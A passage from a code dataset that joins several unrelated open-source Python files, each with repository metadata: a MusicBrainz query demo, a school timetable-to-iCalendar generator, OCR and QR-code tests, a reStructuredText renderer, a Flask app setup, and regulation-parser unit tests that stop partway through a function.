    """Demo driver: search MusicBrainz for 'Nirvana', then fetch and list
    the releases of one matching artist."""
    results = query_by_name(URL, query_type["simple"], "Nirvana")
    pretty_print(results)
    # NOTE(review): index 1 assumes the second search hit is the artist we
    # want -- this depends entirely on MusicBrainz's result ordering.
    artist_id = results["artists"][1]["id"]
    print "\nARTIST:"
    pretty_print(results["artists"][1])
    artist_data = query_site(URL, query_type["releases"], artist_id)
    releases = artist_data["releases"]
    print "\nONE RELEASE:"
    pretty_print(releases[0], indent=2)
    release_titles = [r["title"] for r in releases]
    print "\nALL TITLES:"
    for t in release_titles:
        print t
if __name__ == '__main__':
    main()
| eneskemalergin/MongoDB | Lesson1/musicbrainz.py | Python | mit | 1,650 |
#!/usr/bin/env python
# Class Based implementation of the BHS calendar
from datetime import datetime as dt
from datetime import timedelta as td
import csv, re
from icalendar import Calendar, Event
# What period is at what time? eg. period 1 from 8:40 - 9:45
from new_schedule_times import reg, l1, l2, l3, l4, l5, lunch, \
plus_a_registration, plus_a_lunch, \
plus_an_hour, plus_half_an_hour, \
plus_a_lesson, plus_half_a_day, \
plus_a_working_day, timetable_path_n_file
def add_half_a_day(ical, a_day):
    """Append a morning-only 'Half Day' event for this date.

    *a_day* is a ``(key, day_data)`` pair as produced by iterating the
    calendar dict; returns the (mutated) calendar.
    """
    date_key, day_data = a_day
    start = day_data.date + reg
    event = Event()
    event.add('summary', 'Half Day')
    event['location'] = 'BHS'
    event.add('dtstart', start)
    event.add('dtend', start + plus_half_a_day)
    event['uid'] = 'Half{0}{1}'.format(date_key,
                                       str(day_data.date).replace(" ", "-"))
    ical.add_component(event)
    return ical
def add_special_day(ical, a_day):
    """Append a full-working-day event named after ``day_data.special_day``
    (e.g. a sports or arts day); returns the (mutated) calendar."""
    date_key, day_data = a_day
    start = day_data.date + reg
    event = Event()
    event.add('summary', day_data.special_day)
    event['location'] = 'BHS'
    event.add('dtstart', start)
    event.add('dtend', start + plus_a_working_day)
    event['uid'] = 'Special{0}{1}{2}'.format(
        date_key, str(day_data.date).replace(" ", "-"), day_data.special_day)
    ical.add_component(event)
    return ical
def add_PD_day(ical, a_day):
    """Append a full-day 'Professional Development' event (starting at the
    first-lesson slot); returns the (mutated) calendar."""
    date_key, day_data = a_day
    start = day_data.date + l1
    event = Event()
    event.add('summary', 'Professional Development')
    event['location'] = 'BHS'
    event.add('dtstart', start)
    event.add('dtend', start + plus_a_working_day)
    event['uid'] = 'PD{0}{1}'.format(date_key,
                                     str(day_data.date).replace(" ", "-"))
    ical.add_component(event)
    return ical
def add_statistics_string(day_data):
    # Build the multi-line "lessons taught / lessons left" report embedded
    # in each day-number event's description.  Reads per-class counters from
    # day_data.stats (keys '<class>-done' / '<class>-left') plus the three
    # whole-year counters.
    all_classes = get_list_of_unique_lessons(timetable_path_n_file)
    dd = day_data
    full_string = 'The following numbers show the lessons you will \
teach minus half-days, study leave, sports/art/steam days and final exams: \n\n'
    for class_name in all_classes:
        # One line per class, e.g. "IB1 Phys: 76 days taught | 6 days left".
        sub_string = class_name + ': %s days taught | %s days left \n' % \
        (day_data.stats[class_name+'-done'], day_data.stats[class_name+'-left'])
        full_string = full_string + sub_string
    teaching_days ='\n %d days of teaching left, %d days of teaching done \n ' % \
        (dd.stats['days_left_teaching'], dd.stats['days_taught'])
    just_days = "%d days left 'til the summer! \n\n" % \
        dd.stats['days_to_summer']
    disclaimer = '''DISCLAIMER: You will have fewer lessons than
            indicated due to the usual suspects:
            Torch Day, Days out, trips, Y7 endeavour, etc.'''
    full_string = full_string + teaching_days + just_days + disclaimer
    return full_string
def short_statistics(day_data):
    '''
    A quick overview of statistics.
    Called by PDF generator sandbox.py

    Returns a list of short "<class> : <done> / <left>" strings, one per
    class found in the timetable file.
    '''
    all_classes = get_list_of_unique_lessons(timetable_path_n_file)
    dd = day_data
    list_of_short_stats = []
    for class_name in all_classes:
        # Earlier variant that special-cased long names like 'Y11 Phy 6';
        # kept for reference -- both branches produced the same prefix.
        # if len(class_name.split(' ')) > 2:
        #     # if it is of the form 'Y11 Phy 6'
        #     sub_string = class_name.split(' ')[0] + \
        #                  ' : %s / %s' % \
        #     (day_data.stats[class_name+'-done'], day_data.stats[class_name+'-left'])
        # else:
        # if it is of the form 'IB1'
        # Only the year-group prefix (text before the first space) is shown.
        sub_string = class_name.split(' ')[0]+ \
                     ' : %s / %s' % \
        (day_data.stats[class_name+'-done'], day_data.stats[class_name+'-left'])
        list_of_short_stats.append(sub_string)
    return list_of_short_stats
def _add_lesson_event(ical, date_key, day_date, slot_name, slot_start, lesson):
    """Append one timetabled lesson Event to *ical*.

    :param date_key: calendar key for the day (part of the event uid)
    :param day_date: the day's base datetime
    :param slot_name: period identifier, 'L1'..'L5'
    :param slot_start: timedelta offset of the period start within the day
    :param lesson: lesson string of the form '<class>@<room>'
    """
    event = Event()
    event.add('summary', lesson)
    # The room is encoded after the '@' in the lesson string.
    event['location'] = lesson.split('@')[1]
    event.add('dtstart', day_date + slot_start)
    event.add('dtend', day_date + slot_start + plus_a_lesson)
    event['uid'] = slot_name + str(date_key) + str(day_date).replace(" ", "-")
    ical.add_component(event)


def add_teaching_day(ical, a_day):
    """Create the icalendar entries for a normal teaching day.

    Adds a 'Day N' banner event (carrying the teaching statistics in its
    description), one event per non-empty lesson slot L1-L5, an optional
    after-school meeting event, and an optional note listing which year
    groups are on leave.  Returns the (mutated) calendar.

    The original implementation repeated the same lesson-event code five
    times (once per slot); that is now factored into _add_lesson_event.
    """
    day_data = a_day[1]
    # Banner event announcing the day number, placed before registration.
    day_nr_event = Event()
    day_nr_event.add('summary', 'Day %s' % day_data.day_number)
    stats_string = add_statistics_string(day_data)
    day_nr_event.add('description', stats_string)
    day_nr_event['location'] = 'BHS'
    day_nr_event.add('dtstart', day_data.date + reg - plus_an_hour)
    day_nr_event.add('dtend', day_data.date + reg - plus_half_an_hour)
    day_nr_event['uid'] = 'dayNR' + str(a_day[0]) + \
        str(day_data.date).replace(" ", "-")
    ical.add_component(day_nr_event)
    # One event per non-empty lesson slot; an empty string means a free
    # period and is skipped.
    for slot_name, slot_start, lesson in (
            ('L1', l1, day_data.L1),
            ('L2', l2, day_data.L2),
            ('L3', l3, day_data.L3),
            ('L4', l4, day_data.L4),
            ('L5', l5, day_data.L5)):
        if lesson:
            _add_lesson_event(ical, a_day[0], day_data.date,
                              slot_name, slot_start, lesson)
    if day_data.meeting:
        # After-school meeting: one registration-length gap after L5 ends.
        meeting_event = Event()
        meeting_event.add('summary', day_data.meeting + ' meeting')
        meeting_event['location'] = 'Department/QEH'
        meeting_event.add('dtstart', day_data.date + l5 + plus_a_lesson +
                          plus_a_registration)
        meeting_event.add('dtend', day_data.date + l5 + plus_a_lesson +
                          plus_a_registration + plus_an_hour)
        meeting_event['uid'] = day_data.meeting + str(a_day[0]) + \
            str(day_data.date).replace(" ", "-")
        ical.add_component(meeting_event)
    # Note which year groups are away (trips, study leave, ...).
    leaves = [day_data.y7_leave, day_data.y8_leave, day_data.y9_leave,
              day_data.y10_leave, day_data.y11_leave,
              day_data.ib1_leave, day_data.ib2_leave]
    leave_index = [i for i, x in enumerate(leaves) if x]
    # 0.5 in a leave column means away for the morning only.
    leave_dict = {0: 'Y7 leave', 1: 'Y8 leave', 2: 'Y9 leave',
                  3: 'Y10 leave', 4: 'Y11 leave', 5: 'IB1 leave',
                  6: 'IB2 leave'}
    leave_string = '| '.join([leave_dict[i] for i in leave_index])
    if leave_string:
        leave_note = Event()
        leave_note.add('summary', leave_string)
        leave_note.add('description', leave_string)
        # NOTE(review): dtstart is 06:20 but dtend is 06:00 + lunch; this
        # asymmetry is preserved from the original -- confirm it is intended.
        leave_note.add('dtstart', day_data.date + td(hours=6, minutes=20))
        leave_note.add('dtend', day_data.date + td(hours=6, minutes=0) +
                       plus_a_lunch)
        leave_note['uid'] = 'leaveInfo' + str(a_day[0]) + \
            str(day_data.date).replace(" ", "-")
        ical.add_component(leave_note)
    return ical
def count_teaching_days(bhs_calendar):
    """Return how many days in *bhs_calendar* are teaching days.

    ``bhs_calendar`` maps dates to per-day objects carrying a truthy
    ``teaching_day`` attribute.  The original implementation sorted the
    whole calendar (via the Python-2-only ``iteritems``) just to count;
    a count is order-independent, so we simply scan the values.  Using
    ``values()`` also works on both Python 2 and 3.
    """
    return sum(1 for day_data in bhs_calendar.values()
               if day_data.teaching_day)
def count_lesson_days(bhs_calendar, lesson_string,
                      adate=dt(2018, 8, 30), opt='left'):
    """Count the days on which a particular lesson is actually taught.

    A day counts when it is a teaching day, one of its five lesson slots
    contains *lesson_string*, and the matching year group is not on leave
    that day.  With ``opt='left'`` only days strictly after *adate* are
    counted; with ``opt='done'`` only days strictly before it (a day equal
    to *adate* is counted by neither, as in the original).

    Leave entries only carry the year-group prefix ('Y11 leave', 'IB2
    leave', ...), so only the part of *lesson_string* before the first
    space is matched against them (e.g. 'Y11 Phy 6' -> 'Y11').

    Rewritten from the original: the needless sort of the whole calendar
    and the Python-2-only ``iteritems`` are gone (counting is order
    independent), and the nested conditionals are flattened into guard
    clauses.  The counting semantics are unchanged.
    """
    leave_names = ('Y7 leave', 'Y8 leave', 'Y9 leave', 'Y10 leave',
                   'Y11 leave', 'IB1 leave', 'IB2 leave')
    short_name = lesson_string.split(' ')[0]
    counter = 0
    for day_data in bhs_calendar.values():
        if not day_data.teaching_day:
            continue
        lessons = [day_data.L1, day_data.L2, day_data.L3,
                   day_data.L4, day_data.L5]
        if not any(lesson_string in lesson for lesson in lessons):
            continue
        # A 0.5 in a leave column means away for the morning only; any
        # truthy value marks the group as away (as in the original).
        leave_flags = [day_data.y7_leave, day_data.y8_leave,
                       day_data.y9_leave, day_data.y10_leave,
                       day_data.y11_leave, day_data.ib1_leave,
                       day_data.ib2_leave]
        on_leave = [name for name, flag in zip(leave_names, leave_flags)
                    if flag]
        if any(short_name in name for name in on_leave):
            continue
        if opt == 'left' and day_data.date > adate:
            counter += 1
        elif opt == 'done' and day_data.date < adate:
            counter += 1
    return counter
def get_list_of_unique_lessons(timetable_path_n_file):
    '''
    Return the unique lesson names found in the timetable CSV.

    `input`: path to the timetable CSV (day number in column 0, lesson
             strings such as 'IB1 Phys@Lab-2' in the remaining columns)
    `output`: unique lessons with the '@location' suffix stripped, grouped
              in year order, for ex:
        ['9A Sc', 'Y10 Phys 1', 'Y11 Phys 2', 'IB1 Phys', 'IB2 D.tech']

    Fixes over the original: the file handle is now closed via ``with``
    (the original leaked it -- its ``close()`` call was commented out),
    the Python-3-fatal ``ur''`` literal and ``reader.next()`` are replaced
    with portable equivalents, and the file is opened in text mode as the
    csv module expects on Python 3 (identical behaviour on POSIX Python 2).
    '''
    timetable_dict = {}
    with open(timetable_path_n_file) as timetable:
        tt_reader = csv.reader(timetable)
        next(tt_reader)  # skip the header row
        for row in tt_reader:
            timetable_dict[int(row[0])] = row[1:]
    all_lessons = []
    for day_number in timetable_dict:
        all_lessons += timetable_dict[day_number]
    # Strip the '@location' suffix, e.g. 'IB1 Phys@Lab-2' -> 'IB1 Phys'.
    # (re.DOTALL was dropped: the pattern contains no '.', so it had no
    # effect.)
    location_re = re.compile(r'\@[\w\-]*')
    lessons_without_location = [location_re.sub('', lesson).strip()
                                for lesson in all_lessons]
    # Deduplicate and drop empty (free-period) entries.
    unique_lessons = [lesson for lesson in set(lessons_without_location)
                      if lesson]
    # Emit lessons grouped by year: everything matching '7' first, then
    # '8', ... (a lesson matching several groups appears once per match,
    # exactly as before).
    sorted_unique_lessons = []
    all_class_strings = ['7', '8', '9', '10', '11', 'IB1', 'IB2']
    for sub_str in all_class_strings:
        for lesson in unique_lessons:
            if sub_str in lesson:
                sorted_unique_lessons.append(lesson)
    return sorted_unique_lessons
'''
You have 11 days of teaching left (excluding half days, holidays, PD days)
and have taught 162 days so far
IB2 Phys: 59 LESSONS TAUGHT | 0 LESSONS LEFT
Y11-1: 62 LESSONS TAUGHT | 0 LESSONS LEFT
Y10-1: 50 LESSONS TAUGHT | 4 LESSONS LEFT
Y9 Sc: 104 LESSONS TAUGHT | 8 LESSONS LEFT
Y10-6: 76 LESSONS TAUGHT | 6 LESSONS LEFT
IB1 Phys: 76 LESSONS TAUGHT | 6 LESSONS LEFT
Y10C Reg.: 151 LESSONS TAUGHT | 12 LESSONS LEFT
{'Y11 Phy 6': 82, 'Y8A Sc': 111, 'Y11 Phy 1': 84, 'IB1': 125, 'IB2': 56, 'Y10 Phy 1': 55} # # #
This excludes study leave and exams.
DISCLAIMER: You may have fewer lessons than indicated
here due to the usual suspects: Torch Day, Days out, trips, etc.
'''
| alphydan/bhs-ical | new-bhs-cal/import_fun_and_stats.py | Python | gpl-2.0 | 13,512 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <ecino@compassion.ch>
#
# The licence is in the file __openerp__.py
#
##############################################################################
from .. import tools
from openerp.tests import common
import logging
import cv2
import numpy as np
import os
logger = logging.getLogger(__name__)
THIS_DIR = os.path.dirname(__file__)
class TestTools(common.TransactionCase):
    """
    Tests all utility functions used for importing letters.

    Uses three fixture scans under testdata/: a normal scanned letter, a
    noise image, and an all-white page.
    """
    def setUp(self):
        super(TestTools, self).setUp()
        # Fixture images shipped next to this test module.
        self.test_document_normal = os.path.join(THIS_DIR,
                                                 'testdata/normal.png')
        self.test_document_noise = os.path.join(THIS_DIR, 'testdata/noise.png')
        self.test_document_white = os.path.join(THIS_DIR, 'testdata/white.png')
        # All templates that actually carry a pattern image.
        template_obj = self.env['correspondence.template']
        self.templates = template_obj.search([('pattern_image', '!=', False)])
    def test_blue_corner_finder_should_find(self):
        """
        Blue corner should be found at known coordinates.
        """
        img = self._read_img(self.test_document_normal)
        blue_corner_position = self._blue_corner_position(img)
        self.assertEqual(blue_corner_position, [2416, 76])
    def test_blue_corner_finder_should_not_find(self):
        """
        Blue corner should not be found.
        """
        img = self._read_img(self.test_document_white)
        blue_corner_position = self._blue_corner_position(img)
        self.assertIsNone(blue_corner_position)
    def test_pattern_recognition(self):
        """
        Pattern should be recognized correctly.
        """
        template, pattern_center = self._pattern_recognition(
            self.test_document_normal)
        self.assertIsNotNone(template)
        self.assertEqual(template.name, 'Test Template 2')
        # Allow 1px of tolerance on the detected pattern centre.
        np.testing.assert_allclose(pattern_center,
                                   np.array([1273, 3301]),
                                   atol=1)
    def test_pattern_recognition_no_pattern(self):
        """
        Pattern should not be found.
        """
        template, _ = self._pattern_recognition(self.test_document_noise)
        self.assertIsNone(template)
        template, _ = self._pattern_recognition(self.test_document_white)
        self.assertIsNone(template)
    def test_zxing_read_qr_code(self):
        """
        QR code should be read correctly.
        """
        qr_code = self._qr_decode(self.test_document_normal)
        self.assertIsNotNone(qr_code)
        self.assertEqual(qr_code.data, '1512093XXDR1611115\n')
    def test_zxing_no_qr_code(self):
        """
        Should report error for document that does not contain QR code.
        """
        qr_code = self._qr_decode(self.test_document_noise)
        self.assertIsNone(qr_code)
        qr_code = self._qr_decode(self.test_document_white)
        self.assertIsNone(qr_code)
    def test_check_box_reader(self):
        """
        Checkboxes should be read correctly.
        """
        # Load image that has the French and Italian box checked
        img = self._read_img(self.test_document_normal)
        # French
        box = self._make_box(1260, 120)
        self.assertTrue(self._checked_state(img[box]))
        # Italian
        box = self._make_box(1260, 200)
        self.assertTrue(self._checked_state(img[box]))
        # German
        box = self._make_box(1260, 280)
        self.assertFalse(self._checked_state(img[box]))
        # Spanish
        box = self._make_box(1700, 120)
        self.assertFalse(self._checked_state(img[box]))
        # English
        box = self._make_box(1700, 200)
        self.assertFalse(self._checked_state(img[box]))
        # Other
        box = self._make_box(1700, 280)
        self.assertFalse(self._checked_state(img[box]))
    # --- helpers -----------------------------------------------------------
    def _read_img(self, path):
        # Load the image with OpenCV, failing the test if it cannot be read.
        img = cv2.imread(path)
        self.assertIsNotNone(img)
        return img
    def _pattern_recognition(self, path):
        img = self._read_img(path)
        # when the parameter test=False (default value)
        # find_template returns a third parameter equals to None
        return tools.patternrecognition.find_template(
            img, self.templates, 0.3)[:2]
    @staticmethod
    def _qr_decode(path):
        # Decode a QR code from the image file via the zxing wrapper.
        path = os.path.abspath(path)
        bar_code_tool = tools.zxing_wrapper.BarCodeTool()
        qr_code = bar_code_tool.decode(path, try_harder=True)
        return qr_code
    @staticmethod
    def _blue_corner_position(img):
        blue_corner_finder = tools.bluecornerfinder.BlueCornerFinder(img)
        return blue_corner_finder.getIndices()
    @staticmethod
    def _make_box(x, y, size=50):
        # Slices addressing a size x size region at (x, y): [rows, cols].
        return [slice(y, y + size), slice(x, x + size)]
    @staticmethod
    def _checked_state(img):
        checkbox_reader = tools.checkboxreader.CheckboxReader(img)
        return checkbox_reader.getState()
| emgirardin/compassion-modules | sbc_compassion/tests/test_tools.py | Python | agpl-3.0 | 5,172 |
import argparse
import codecs
import locale
import sys
from . import render
# Adopt the user's default locale for any locale-aware behaviour downstream.
locale.setlocale(locale.LC_ALL, "")
def main():
    """Read reStructuredText from a file argument (or stdin), render it,
    and write the UTF-8 encoded result to stdout."""
    parser = argparse.ArgumentParser(description="renders reStructuredText")
    parser.add_argument(
        "source",
        nargs="?",
        help="file to open and render",
    )
    options = parser.parse_args()
    if options.source:
        with codecs.open(options.source, "r", "utf-8") as source_file:
            text = source_file.read()
    else:
        text = sys.stdin.read()
    sys.stdout.write(render(text).encode("utf-8"))
    sys.stdout.flush()
if __name__ == "__main__":
    sys.exit(main())
| dstufft/recliner | recliner/__main__.py | Python | bsd-2-clause | 638 |
import os
import logging
from flask import Flask, abort, g
from config import config
from api_v1 import bp as api_v1_bp
from ui import bp as ui_bp
# Application object plus blueprint registration.
app = Flask(__name__)
app.config.from_object(config)
app.register_blueprint(api_v1_bp, url_prefix='/api/v1')
# BUG FIX: register_blueprint() has no 'url_path' option -- the original
# ``url_path='/'`` keyword was silently ignored and the UI blueprint was
# mounted at the application root anyway.  Drop the bogus keyword to make
# that explicit (the intended option is ``url_prefix``, whose default
# already mounts the blueprint's rules unprefixed).
app.register_blueprint(ui_bp)
@app.before_first_request
def set_root_path():
    """Fill in the 'root_path' and 'playbooks_path' config defaults.

    'root_path' defaults to the parent of the Flask package directory;
    'playbooks_path' defaults to '<root_path>/playbooks'.  Explicitly
    configured values are kept.
    """
    if not app.config.get('root_path'):
        app.config['root_path'] = os.path.dirname(app.root_path)
    if not app.config.get('playbooks_path'):
        app.config['playbooks_path'] = os.path.join(
            app.config['root_path'], 'playbooks')
@app.before_first_request
def logger():
    """Attach a stream handler at INFO level when not running in debug
    mode (debug mode already logs to the console)."""
    if app.debug:
        return
    app.logger.addHandler(logging.StreamHandler())
    app.logger.setLevel(logging.INFO)
@app.errorhandler(500)
def internal_server_error(e):
    """Log the unhandled exception and return a plain 500 response.

    BUG FIX: the original returned ``abort(500)``, but ``abort`` *raises*
    ``InternalServerError`` rather than returning a response, so the 500
    handler re-entered Flask's error machinery instead of producing the
    generic page it logged for.  Returning a (body, status) tuple yields
    the intended response.
    """
    app.logger.exception(e)
    return 'Internal Server Error', 500
| sivel/sai | sai/__init__.py | Python | apache-2.0 | 978 |
# vim: set fileencoding=utf-8
from unittest import TestCase
from mock import patch
from regparser.layer.terms import ParentStack, Terms
from regparser.layer.def_finders import Ref
from regparser.tree.struct import Node
import settings
class LayerTermTest(TestCase):
    def setUp(self):
        # Isolate every test from the module-wide ignore list; restored in
        # tearDown so tests cannot leak configuration into each other.
        self.original_ignores = settings.IGNORE_DEFINITIONS_IN
        settings.IGNORE_DEFINITIONS_IN = {'ALL': []}
    def tearDown(self):
        settings.IGNORE_DEFINITIONS_IN = self.original_ignores
    def test_is_exclusion(self):
        """There are certain indicators that a definition _should not_ be
        considered the definition of that term. For example, exclusions to a
        general definition should not replace the original. We can also
        explicitly ignore chunks of text when finding definitions.."""
        t = Terms(None)
        n = Node('ex ex ex', label=['1111', '2'])
        # Not an exclusion: the term is not yet in scope.
        self.assertFalse(t.is_exclusion('ex', n))
        t.scoped_terms = {('1111',): [Ref('abc', '1', 0)]}
        self.assertFalse(t.is_exclusion('ex', n))
        t.scoped_terms = {('1111',): [Ref('ex', '1', 0)]}
        self.assertFalse(t.is_exclusion('ex', n))
        # "does not include" marks an exclusion -- but only for a term
        # already defined in scope.
        n.text = u'Something something the term “ex” does not include potato'
        self.assertTrue(t.is_exclusion('ex', n))
        t.scoped_terms = {('1111',): [Ref('abc', '1', 0)]}
        self.assertFalse(t.is_exclusion('ex', n))
        # Text listed in IGNORE_DEFINITIONS_IN also counts as an exclusion.
        settings.IGNORE_DEFINITIONS_IN['1111'] = ['phrase with abc in it']
        self.assertFalse(t.is_exclusion('abc', n))
        n.text = "Now the node has a phrase with abc in it, doesn't it?"
        self.assertTrue(t.is_exclusion('abc', n))
    def test_node_definitions_no_def(self):
        """Verify that none of the matchers match certain strings"""
        t = Terms(None)
        stack = ParentStack()
        stack.add(0, Node(label=['999']))
        stack.add(1, Node('Definitions', label=['999', '1']))
        no_defs = ['This has no defs',
                   'Also has no terms',
                   'Still no terms, but',
                   'the next one does']
        for txt in no_defs:
            defs, exc = t.node_definitions(Node(txt), stack)
            self.assertEqual([], defs)
            self.assertEqual([], exc)
    # NOTE(review): method name has a typo ('defintions'); kept as-is since
    # renaming would alter test discovery/reporting.
    def test_node_defintions_act(self):
        # A quoted term followed by "means" is picked up as a definition.
        t = Terms(None)
        stack = ParentStack()
        stack.add(0, Node('Definitions', label=['9999']))
        node = Node(u'“Act” means something else entirely')
        included, excluded = t.node_definitions(node, stack)
        self.assertEqual(1, len(included))
        self.assertEqual([], excluded)
    def test_node_definitions_needs_term(self):
        # "the term means ..." without a quoted term must not match.
        t = Terms(None)
        stack = ParentStack()
        stack.add(0, Node('Definitions', label=['9999']))
        node = Node(u"However, for purposes of rescission under §§ 1111.15 " +
                    u"and 1111.13, and for purposes of §§ 1111.12(a)(1), " +
                    u"and 1111.46(d)(4), the term means all calendar " +
                    u"days...")
        self.assertEqual(([], []), t.node_definitions(node, stack))
    def test_node_definitions_exclusion(self):
        # Once 'bologna' is defined in scope, a later "does not include"
        # sentence is reported as an exclusion rather than a definition.
        n1 = Node(u'“Bologna” is a type of deli meat', label=['111', '1'])
        n2 = Node(u'Let us not forget that the term “bologna” does not ' +
                  'include turtle meat', label=['111', '1', 'a'])
        t = Terms(Node(label=['111'], children=[n1, n2]))
        t.pre_process()
        stack = ParentStack()
        stack.add(1, Node('Definitions'))
        included, excluded = t.node_definitions(n1, stack)
        self.assertEqual([Ref('bologna', '111-1', 1)], included)
        self.assertEqual([], excluded)
        t.scoped_terms[('111', '1')] = included
        included, excluded = t.node_definitions(n2, stack)
        self.assertEqual([], included)
        self.assertEqual([Ref('bologna', '111-1-a', 33)], excluded)
    def test_node_definitions_multiple_xml(self):
        """Find xml definitions which are separated by `and`"""
        stack = ParentStack().add(0, Node(label=['9999']))
        winter = Node("(4) Cold and dreary mean winter.", label=['9999', '4'])
        # Terms are emphasized with <E T="03"> tags in the tagged text.
        winter.tagged_text = ('(4) <E T="03">Cold</E> and '
                              '<E T="03">dreary</E> mean winter.')
        inc, _ = Terms(None).node_definitions(winter, stack)
        self.assertEqual(len(inc), 2)
        cold, dreary = inc
        # Offsets are character positions within the node's plain text.
        self.assertEqual(cold, Ref('cold', '9999-4', 4))
        self.assertEqual(dreary, Ref('dreary', '9999-4', 13))
    def test_node_definitions_xml_commas(self):
        """Find xml definitions which have commas separating them"""
        stack = ParentStack().add(0, Node(label=['9999']))
        summer = Node("(i) Hot, humid, or dry means summer.",
                      label=['9999', '4'])
        summer.tagged_text = ('(i) <E T="03">Hot</E>, <E T="03">humid</E>, '
                              'or <E T="03">dry</E> means summer.')
        inc, _ = Terms(None).node_definitions(summer, stack)
        self.assertEqual(len(inc), 3)
        hot, humid, dry = inc
        self.assertEqual(hot, Ref('hot', '9999-4', 4))
        self.assertEqual(humid, Ref('humid', '9999-4', 9))
        self.assertEqual(dry, Ref('dry', '9999-4', 19))
    def test_node_definitions_xml_or(self):
        """Find xml definitions which are separated by `or`"""
        stack = ParentStack().add(0, Node(label=['9999']))
        tamale = Node("(i) Hot tamale or tamale means nom nom",
                      label=['9999', '4'])
        tamale.tagged_text = ('(i) <E T="03">Hot tamale</E> or <E T="03"> '
                              'tamale</E> means nom nom ')
        inc, _ = Terms(None).node_definitions(tamale, stack)
        self.assertEqual(len(inc), 2)
        hot, tamale = inc
        self.assertEqual(hot, Ref('hot tamale', '9999-4', 4))
        self.assertEqual(tamale, Ref('tamale', '9999-4', 18))
    def test_node_definitions_too_long(self):
        """Don't find definitions which are too long"""
        stack = ParentStack().add(0, Node('Definitions', label=['9999']))
        # A whole boilerplate declaration in quotes must not be treated as
        # a defined term.
        text = u"""“I declare under the penalties of perjury that this—(insert
type of document, such as, statement, application, request,
certificate), including the documents submitted in support thereof,
has been examined by me and, to the best of my knowledge and belief,
is true, correct, and complete.”"""
        node = Node(u'```extract\n{}\n```'.format(text))
        included, excluded = Terms(None).node_definitions(node, stack)
        self.assertEqual([], included)
        self.assertEqual([], excluded)
    def test_pre_process(self):
        # Build a small regulation tree: a no-name subpart with one section
        # and a named subpart (XQXQ) with scoped definitions at several
        # depths, then verify pre_process() scopes each term correctly.
        noname_subpart = Node(
            '',
            label=['88', 'Subpart'],
            node_type=Node.EMPTYPART,
            children=[
                Node(u"Definition. For the purposes of this part, " +
                     u"“abcd” is an alphabet", label=['88', '1'])])
        xqxq_subpart = Node(
            '',
            title='Subpart XQXQ: The unreadable',
            label=['88', 'Subpart', 'XQXQ'], node_type=Node.SUBPART,
            children=[
                Node(label=['88', '2'], children=[
                    Node(label=['88', '2', 'a'],
                         text="Definitions come later for the purposes of " +
                              "this section ",
                         children=[
                             Node(u"“AXAX” means axe-cop",
                                  label=['88', '2', 'a', '1'])]),
                    Node(label=['88', '2', 'b'], children=[
                        Node(label=['88', '2', 'b', 'i'], children=[
                            Node(label=['88', '2', 'b', 'i', 'A'],
                                 text=u"Definition. “Awesome sauce” means " +
                                      "great for the purposes of this " +
                                      "paragraph",)])])])])
        tree = Node(label=['88'], children=[noname_subpart, xqxq_subpart])
        t = Terms(tree)
        t.pre_process()
        # "for the purposes of this part" scopes 'abcd' to the whole part.
        self.assertTrue(('88',) in t.scoped_terms)
        self.assertEqual([Ref('abcd', '88-1', 44)],
                         t.scoped_terms[('88',)])
        # "for the purposes of this section" scopes 'axax' to 88.2.
        self.assertTrue(('88', '2') in t.scoped_terms)
        self.assertEqual([Ref('axax', '88-2-a-1', 1)],
                         t.scoped_terms[('88', '2')])
        # "for the purposes of this paragraph" keeps 'awesome sauce' local.
        self.assertTrue(('88', '2', 'b', 'i', 'A') in t.scoped_terms)
        self.assertEqual([Ref('awesome sauce', '88-2-b-i-A', 13)],
                         t.scoped_terms[('88', '2', 'b', 'i', 'A')])
        # Check subparts are correct
        self.assertEqual({None: ['1'], 'XQXQ': ['2']},
                         dict(t.scope_finder.subpart_map))
        # Finally, make sure the references are added
        referenced = t.layer['referenced']
        self.assertTrue('abcd:88-1' in referenced)
        self.assertEqual('abcd', referenced['abcd:88-1']['term'])
        self.assertEqual('88-1', referenced['abcd:88-1']['reference'])
        self.assertEqual((44, 48), referenced['abcd:88-1']['position'])
        self.assertTrue('axax:88-2-a-1' in referenced)
        self.assertEqual('axax', referenced['axax:88-2-a-1']['term'])
        self.assertEqual('88-2-a-1', referenced['axax:88-2-a-1']['reference'])
        self.assertEqual((1, 5), referenced['axax:88-2-a-1']['position'])
        self.assertTrue('awesome sauce:88-2-b-i-A' in referenced)
        self.assertEqual('awesome sauce',
                         referenced['awesome sauce:88-2-b-i-A']['term'])
        self.assertEqual('88-2-b-i-A',
                         referenced['awesome sauce:88-2-b-i-A']['reference'])
        self.assertEqual((13, 26),
                         referenced['awesome sauce:88-2-b-i-A']['position'])
    def test_pre_process_defined_twice(self):
        # When a term appears twice, the *defining* occurrence's position
        # is recorded (the first "means" sentence).
        tree = Node(u"The term “lol” means laugh out loud. " +
                    u"How do you pronounce “lol”, though?",
                    label=['1212', '5'])
        t = Terms(tree)
        t.pre_process()
        self.assertEqual(t.layer['referenced']['lol:1212-5']['position'],
                         (10, 13))
    def test_pre_process_subpart(self):
        # The same term defined in two subparts stays scoped per subpart.
        root = Node(label=['1212'])
        subpartA = Node(label=['1212', 'Subpart', 'A'], title='Subpart A')
        section2 = Node(label=['1212', '2'], title='1212.2')
        def1 = Node(u"“totes” means in total", label=['1212', '2', 'a'])
        subpartB = Node(label=['1212', 'Subpart', 'B'], title='Subpart B')
        section22 = Node("\nFor the purposes of this subpart",
                         label=['1212', '22'], title='1212.22')
        def2 = Node(u"“totes” means in extremely", label=['1212', '22', 'a'])
        root.children = [subpartA, subpartB]
        subpartA.children, subpartB.children = [section2], [section22]
        section2.children, section22.children = [def1], [def2]
        t = Terms(root)
        t.pre_process()
        self.assertTrue(('1212',) in t.scoped_terms)
        self.assertEqual(len(t.scoped_terms[('1212',)]), 1)
        self.assertEqual('1212-2-a', t.scoped_terms[('1212',)][0].label)
        self.assertTrue(('1212', '22') in t.scoped_terms)
        self.assertEqual(len(t.scoped_terms[('1212', '22')]), 1)
        self.assertEqual('1212-22-a', t.scoped_terms[('1212', '22')][0].label)
    @patch.object(Terms, 'node_definitions')
    def test_look_for_defs(self, node_definitions):
        """We should be walking through the tree to find terms. Test this by
        documenting which nodes are touched. We should be _ignoring_ certain
        subtrees (notable, any which aren't associated w/ regtext)"""
        # The mock records each visited node by returning its label id as
        # an "excluded" term.
        node_definitions.side_effect = lambda n, _: ([], [n.label_id()])
        t = Terms(None)
        root = Node(label=['111'], children=[
